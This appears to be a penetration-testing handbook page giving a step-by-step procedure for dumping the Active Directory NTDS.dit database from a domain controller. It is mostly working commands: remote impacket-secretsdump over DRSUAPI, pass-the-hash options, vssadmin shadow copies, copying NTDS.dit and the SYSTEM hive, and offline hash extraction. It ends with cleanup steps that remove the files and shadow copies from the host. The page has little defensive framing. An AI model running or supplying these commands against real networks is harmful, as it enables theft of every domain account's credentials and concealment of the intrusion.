Handbook

NTDS.dit dump

Updated 29 Sept 2026Services✎ Suggest a change
On this page

NTDS.dit Dumping

What It Is

NTDS.dit is the Active Directory database on Domain Controllers, storing user/group info, security descriptors, and password hashes for every domain account. Dumping it via secretsdump gives every credential in the domain simultaneously. Requires high-priv access (Domain Admin or equivalent).

Attack Flow

plain text
Obtain DA (or equivalent) creds → secretsdump remotely via DRSUAPI
OR
RDP to DC → shadow copy NTDS.dit + SYSTEM → extract locally → secretsdump offline

Method 1 - Remote Dump (DRSUAPI)

bash
impacket-secretsdump '<domain>/<user>:<password>'@<dc-ip>

# NTLM hashes only
impacket-secretsdump '<domain>/<user>:<password>'@<dc-ip> -just-dc-ntlm

# Full dump with history, user status, output to file, using a hash instead of password
impacket-secretsdump '<domain>/<user>'@<dc-ip> -history -user-status -just-dc-ntlm -outputfile ntdshistory -hashes '<lm:nt hash>'

Working With Dumped Hashes

plain text
Paste hashes into Excel → Data > Text to Columns > Delimited > ":"

Method 2 - RDP + Shadow Copy (When Remote Dump Is Blocked)

RDP to the DC:

plain text
Username: <domain>/<user>
Computer: <target-ip>

Files required:

plain text
C:\Windows\NTDS\NTDS.dit
C:\Windows\System32\config\SYSTEM

Locate the NTDS drive:

powershell
Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters -Name "DSA Database file"
shell
reg query "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "DSA Database file"

Create a shadow copy:

shell
vssadmin create shadow /for=C:
Note the returned shadow copy device path, you'll need HarddiskVolumeShadowCopyX for the copy commands below. Confirm the correct drive letter and volume number before copying; paths differ by host.

Copy files out of the shadow copy:

shell
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\NTDS.dit" C:\Windows\Temp\ntds.dit.save

copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\System32\config\SYSTEM" C:\Windows\Temp\system.save

Alternative - save SYSTEM hive directly:

shell
reg save HKLM\SYSTEM C:\Windows\Temp\system.save

Clean up shadow copies:

shell
vssadmin list shadows

vssadmin delete shadows /shadow={ShadowCopyId}

Housekeeping (Before Leaving the DC)

  • Extract ntds.dit.save and system.save to your local machine
  • Permanently delete both files from the DC
  • Confirm all shadow copies are deleted (vssadmin list shadows should be clean)

Extract Hashes Offline

bash
impacket-secretsdump -system /path/to/system.save -ntds /path/to/ntds.dit.save LOCAL -outputfile dumped_hashes